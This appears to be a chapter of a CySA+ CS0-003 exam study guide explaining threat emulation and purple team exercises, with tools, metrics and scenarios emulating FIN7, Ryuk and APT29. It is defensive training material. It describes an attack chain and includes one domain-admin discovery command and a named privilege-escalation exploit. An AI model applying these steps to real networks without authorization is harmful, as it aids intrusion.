This chapter covers threat emulation and purple team exercises, two advanced security operations practices that go beyond traditional penetration testing. For the CS0-003 exam, these topics appear in approximately 10-15% of Security Operations questions, particularly those focusing on proactive defense and continuous improvement. Understanding the difference between red, blue, and purple teams, as well as the structured process of threat emulation, is essential for the CySA+ role. You will learn the specific methodologies, tools, and outputs that define these exercises and how they integrate with broader security operations.
Jump to a section
Threat emulation and purple team exercises are like a military force conducting a full-scale combat simulation (a 'force-on-force' exercise) where two teams engage in realistic battle scenarios. The red team acts as the enemy force, using actual enemy tactics, techniques, and procedures (TTPs) to attack. The blue team defends using standard operating procedures. Unlike traditional penetration testing (which is like a single sniper taking potshots at a fortified position), threat emulation is a coordinated, multi-vector assault that mirrors real adversaries. The purple team is like the exercise control group that observes both sides, adjusts the scenario in real time, and ensures that lessons are learned and incorporated into updated defensive plans. The exercise is not about 'winning' but about identifying gaps, testing response procedures, and improving overall readiness. Just as a military after-action review (AAR) examines every decision, a purple team exercise produces detailed findings that directly improve security controls, detection rules, and incident response playbooks.
What is Threat Emulation?
Threat emulation is a structured, goal-oriented security assessment that simulates the tactics, techniques, and procedures (TTPs) of specific threat actors. Unlike vulnerability scanning (which identifies weaknesses) or penetration testing (which exploits vulnerabilities to demonstrate impact), threat emulation focuses on mimicking an adversary's behavior across the entire attack lifecycle, from initial access to exfiltration. The objective is to test detection and response capabilities, not just to find vulnerabilities. Threat emulation is typically performed by a red team, which operates with a specific threat profile (e.g., APT29, FIN7, or a ransomware group) and follows a detailed engagement plan.
Purple Team Exercises
A purple team exercise is a collaborative activity where the red team (offensive) and blue team (defensive) work together, often with a facilitator (the purple team), to improve detection and response capabilities. The purple team acts as a bridge, ensuring that red team activities are visible to the blue team in real time, and that blue team feedback is incorporated into the red team's approach. The goal is not to 'win' but to identify gaps in detection coverage, refine incident response procedures, and validate security controls. Purple team exercises can be conducted as part of a continuous improvement cycle or as a one-time engagement.
Key Components of Threat Emulation
Threat Profile: A detailed description of the adversary being emulated, including their TTPs, target industries, tools, and motivations. Sources include MITRE ATT&CK, threat intelligence feeds, and incident reports.
Engagement Plan: A document outlining the scope, rules of engagement, objectives, and timeline. It specifies what systems can be targeted, what techniques are allowed, and how to handle critical systems.
Emulation Plan: A step-by-step sequence of actions that mimic the adversary's attack chain. Each step maps to a MITRE ATT&CK technique (e.g., T1566 Phishing, T1059 Command and Scripting Interpreter).
Detection and Response Validation: The blue team's ability to detect and respond to each step is measured. Gaps are recorded and prioritized for remediation.
The Threat Emulation Process
Planning and Intelligence Gathering: The red team researches the target environment and selects a threat profile based on the organization's risk profile. They gather open-source intelligence (OSINT) and any authorized internal data.
Emulation Plan Development: The red team creates a detailed emulation plan mapping each action to MITRE ATT&CK techniques. They develop or customize tools to mimic the adversary's capabilities.
Execution: The red team executes the plan, starting with initial access (e.g., phishing email with macro) and progressing through execution, persistence, privilege escalation, defense evasion, credential access, discovery, lateral movement, collection, exfiltration, and command and control.
Purple Team Integration: During execution, the purple team ensures that the blue team is aware of the exercise and can observe red team actions. The blue team records detections and responses.
Analysis and Reporting: After the exercise, the purple team leads a debrief. The red team provides a technical report of their actions, and the blue team provides a detection and response report. Gaps are identified and prioritized.
Remediation and Re-testing: The organization implements fixes (e.g., new detection rules, improved segmentation, updated playbooks). A re-test validates that gaps are closed.
Tools and Technologies
Cobalt Strike: Commercial adversary simulation tool that provides a post-exploitation agent (Beacon) and supports extensive customization for emulating specific TTPs.
Metasploit: Open-source exploitation framework often used for initial access and post-exploitation.
Atomic Red Team: Open-source library of tests mapped to MITRE ATT&CK that can be used for quick validation of detection capabilities.
Caldera: Open-source automated adversary emulation platform developed by MITRE. It uses plugins to execute ATT&CK techniques.
Sysmon and Windows Event Logging: Essential for blue team detection; red team actions generate specific event IDs (e.g., 4688 for process creation, 4104 for PowerShell script block logging).
SIEM and EDR: Blue team uses tools like Splunk, Elastic, CrowdStrike, or SentinelOne to detect and alert on red team activities.
Metrics and Success Criteria
Detection Rate: Percentage of red team actions detected by the blue team during the exercise.
Time to Detect (TTD): Average time from action start to detection.
Time to Respond (TTR): Average time from detection to containment or response.
Coverage Gap: Number of ATT&CK techniques that were not detected or for which no alert fired.
False Positive Rate: Number of alerts generated that were not actual red team actions (can indicate noisy detection rules).
Integration with Security Operations
Threat emulation and purple team exercises are part of a continuous improvement cycle. They feed into: - Detection Engineering: Creating or tuning detection rules (e.g., Sigma rules, YARA rules). - Incident Response Playbooks: Updating response procedures based on observed gaps. - Security Control Tuning: Adjusting firewall rules, IPS signatures, and email security filters. - Training and Awareness: Improving analyst skills through realistic scenarios.
Common Pitfalls
Lack of Scope Clarity: Unclear rules of engagement can lead to unintended service disruption.
Over-reliance on Automated Tools: Emulation must be manual and adaptive to truly mimic adversaries.
Ignoring Purple Team Integration: Without collaboration, exercises become 'red vs. blue' contests that don't improve defenses.
Insufficient Threat Intelligence: Using generic TTPs instead of specific adversary profiles reduces relevance.
CS0-003 Exam Relevance
The exam tests your understanding of:
The difference between red, blue, and purple teams.
The purpose and process of threat emulation (not just pen testing).
How purple team exercises improve detection and response.
Key metrics like detection rate and time to detect.
The role of MITRE ATT&CK in structuring emulation plans.
Common tools (Cobalt Strike, Atomic Red Team, Caldera).
The importance of after-action reviews and continuous improvement.
Define Threat Profile and Scope
The red team collaborates with stakeholders to select a specific threat actor to emulate, based on the organization's threat landscape. They gather intelligence from sources like MITRE ATT&CK, threat reports, and internal risk assessments. The scope is defined: which systems, networks, and applications are in-scope, and what techniques are allowed (e.g., social engineering, physical access). Rules of engagement are established, including emergency stop procedures and communication channels. This step ensures the exercise is realistic but safe.
Develop Emulation Plan
The red team creates a detailed plan mapping each action to a MITRE ATT&CK technique. For example, initial access might use T1566.001 (Spearphishing Attachment), execution via T1059.001 (PowerShell), and persistence via T1547.001 (Registry Run Keys). The plan includes specific commands, tools, and expected outputs. It also defines success criteria for each step (e.g., 'successful execution of payload on target'). The plan is reviewed by the purple team to ensure it aligns with objectives.
Prepare the Blue Team
The purple team briefs the blue team on the exercise, either with full knowledge (white box) or limited knowledge (gray box). The blue team ensures that detection tools are logging appropriately and that incident response procedures are ready. They may also tune detection rules to reduce noise. The purple team establishes a communication channel for real-time feedback. The blue team is instructed to treat red team actions as real incidents unless told otherwise.
Execute Red Team Actions
The red team executes the emulation plan step by step. For example, they send a phishing email with a malicious macro. When the macro runs, it downloads a Cobalt Strike Beacon. The red team then performs discovery commands (e.g., `net group "Domain Admins" /domain`), escalates privileges using a known exploit (e.g., JuicyPotato), and laterally moves to a file server. Each action is logged and timestamped. The purple team monitors the blue team's detection and response in real time.
Conduct After-Action Review
After the exercise, the purple team facilitates a debrief with both red and blue teams. The red team presents their actions and what was detected. The blue team presents their alerts, investigations, and responses. Gaps are identified: techniques that were not detected, alerts that were missed, or responses that were slow. Each gap is assigned a priority and a remediation action. The report includes metrics like detection rate and time to detect. The organization implements fixes and schedules a re-test.
Scenario 1: Financial Institution Emulating FIN7 A large bank wants to test its defenses against FIN7, a financially motivated threat group known for targeting point-of-sale (POS) systems and using spear-phishing with malicious LNK files. The red team develops an emulation plan using Cobalt Strike and creates a phishing campaign targeting the bank's finance department. They use a malicious Excel add-in (XLL) to gain initial access, then use PowerShell to perform discovery and lateral movement to POS servers. The blue team, using an EDR solution, detects the initial phishing but misses the lateral movement due to a gap in network segmentation monitoring. The purple team identifies that the blue team's SIEM lacked a correlation rule for unusual SMB connections from workstations to POS subnets. The remediation involves adding a detection rule and tightening firewall rules. The exercise also reveals that incident response playbooks did not cover POS compromise, leading to a new playbook.
Scenario 2: Healthcare Provider Emulating Ryuk Ransomware A hospital system wants to validate its ransomware defenses by emulating Ryuk, which typically uses Trickbot for initial access and then deploys ransomware. The red team uses a combination of phishing with Trickbot-like payloads and then simulates Ryuk encryption using a custom script that encrypts test files on file shares. The blue team, using a combination of Sysmon logging and a SIEM, detects the initial Trickbot infection via a known IOC but fails to detect the ransomware deployment because the encryption script was not flagged by the EDR's behavior monitoring. The purple team finds that the EDR's ransomware behavior model was not tuned for the specific encryption patterns used. The remediation includes updating the EDR policy and adding a SIEM rule that alerts on mass file extension changes. The hospital also improves backup verification procedures.
Scenario 3: Technology Company Emulating APT29 A cloud-based SaaS company wants to test its detection of APT29 (Cozy Bear), a nation-state actor known for targeting cloud environments. The red team uses valid credentials obtained via password spraying (simulated) to access Office 365, then performs mailbox enumeration and data exfiltration via Outlook Web Access. The blue team, using Microsoft Defender for Office 365 and Cloud App Security, detects the password spraying but does not correlate it with the subsequent mailbox access because the IP addresses used by the red team were not flagged as anomalous. The purple team identifies that the blue team's UEBA rules were not configured to detect access from unusual geographic locations. The remediation includes enabling location-based anomaly detection and creating a playbook for credential-based attacks. The exercise also highlights the need for faster response to password spraying alerts.
CS0-003 Exam Focus on Threat Emulation and Purple Team Exercises The exam tests your understanding of the purpose and process of these exercises, not just definitions. Key objective codes: 1.1 (Explain the importance of security concepts in an enterprise environment) and 2.1 (Given a scenario, analyze indicators of potentially malicious activity). Common wrong answers include confusing threat emulation with penetration testing (pen testing focuses on vulnerability exploitation, not TTP emulation), thinking purple team is a separate team (it's a collaborative exercise, not a permanent role), and believing the goal is to 'catch' the red team (the goal is to improve detection and response). Specific numbers: detection rate and time to detect are common metrics; know that a purple team exercise can be white box (blue team knows the scenario) or gray box (limited knowledge). The exam loves to test edge cases: e.g., what happens if a red team action causes a real outage? (The exercise should be stopped immediately and the incident handled as real). Another edge case: when should you NOT use threat emulation? (When the organization lacks basic security controls; start with vulnerability management first). Terms that appear verbatim: 'rules of engagement', 'after-action review', 'MITRE ATT&CK mapping', 'detection coverage gap'. To eliminate wrong answers, focus on the underlying mechanism: threat emulation is about behavioral simulation, not just finding vulnerabilities. If a question asks about improving detection, think purple team and threat emulation. If it asks about finding vulnerabilities, think penetration testing.
Threat emulation simulates specific adversary TTPs, not just vulnerabilities.
Purple team exercises are collaborative, not adversarial, and focus on improving detection and response.
The after-action review is essential for documenting gaps and assigning remediation.
Common metrics: detection rate, time to detect, time to respond, coverage gap.
Tools: Cobalt Strike, Caldera, Atomic Red Team, Metasploit.
MITRE ATT&CK is used to map emulation plan steps to known adversary techniques.
Rules of engagement must be defined to avoid unintended damage.
Purple team exercises can be white box (full knowledge) or gray box (limited knowledge).
Threat emulation should be part of a continuous improvement cycle, not a one-time event.
These come up on the exam all the time. Here's how to tell them apart.
Red Team Exercise
Red team operates independently, often without blue team knowledge (black box).
Goal is to test overall security posture, including detection and response, but without real-time collaboration.
Success is measured by whether the red team achieves its objectives (e.g., exfiltration).
Findings are shared after the exercise in a report.
Can be adversarial and may cause friction between teams.
Purple Team Exercise
Red and blue teams collaborate in real time, with a facilitator (purple team).
Goal is to improve detection and response capabilities through continuous feedback.
Success is measured by detection rate, time to detect, and coverage gaps.
Findings are discussed during the exercise and in an after-action review.
Promotes cooperation and shared learning.
Mistake
Threat emulation is the same as penetration testing.
Correct
Penetration testing focuses on exploiting vulnerabilities to demonstrate impact, while threat emulation simulates a specific adversary's TTPs across the entire attack lifecycle to test detection and response. Pen testing is vulnerability-centric; threat emulation is behavior-centric.
Mistake
The purple team is a permanent team of security professionals.
Correct
Purple team is a collaborative exercise or methodology, not a permanent team. It involves red and blue teams working together, often facilitated by a purple team lead. The goal is to improve defenses, not to maintain a separate team.
Mistake
The goal of a purple team exercise is for the blue team to catch the red team.
Correct
The goal is to identify gaps in detection and response, not to 'win'. Both teams work together to improve security. Success is measured by metrics like detection rate and time to detect, not by whether the red team was caught.
Mistake
Threat emulation requires expensive commercial tools like Cobalt Strike.
Correct
While Cobalt Strike is common, open-source tools like Caldera, Atomic Red Team, and Metasploit can be used effectively. The key is the emulation plan and methodology, not the tool.
Mistake
After-action reviews are optional in purple team exercises.
Correct
The after-action review is critical. It is where findings are documented, gaps are prioritized, and remediation actions are assigned. Without it, the exercise provides no lasting improvement.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
A red team exercise is an adversarial simulation where the red team attacks the blue team without the blue team's knowledge, testing overall security. A purple team exercise is a collaborative activity where red and blue teams work together, often with a facilitator, to improve detection and response. The purple team ensures real-time feedback and focuses on learning, not winning.
Key metrics include detection rate (percentage of red team actions detected), time to detect (average time from action to detection), time to respond (average time from detection to response), and coverage gap (number of ATT&CK techniques not detected). These metrics help quantify improvements over time.
Common tools include Cobalt Strike (commercial adversary simulation), Caldera (open-source automated emulation by MITRE), Atomic Red Team (open-source test library), and Metasploit (exploitation framework). The choice depends on budget and specific adversary being emulated.
Vulnerability scanning identifies weaknesses (e.g., missing patches, misconfigurations) without exploiting them. Threat emulation simulates a specific adversary's behavior, including exploitation, to test detection and response. Scanning is passive; emulation is active and behavioral.
MITRE ATT&CK provides a framework of adversary TTPs. In threat emulation, the red team maps each action to a specific technique (e.g., T1566 Phishing, T1059 PowerShell) to ensure the simulation is structured and measurable. It also helps the blue team identify which techniques they can detect.
Yes. A purple team exercise can be facilitated by an experienced security professional who acts as the purple team lead. The key is to have a structured process for real-time collaboration and after-action review, not necessarily a permanent team.
Rules of engagement should specify in-scope systems and networks, allowed techniques (e.g., social engineering, physical access), prohibited actions (e.g., causing denial of service), emergency stop procedures, communication channels, and data handling requirements. They must be approved by stakeholders.
You've just covered Threat Emulation and Purple Team Exercises — now see how well it sticks with free CS0-003 practice questions. Full explanations included, no account needed.
Done with this chapter?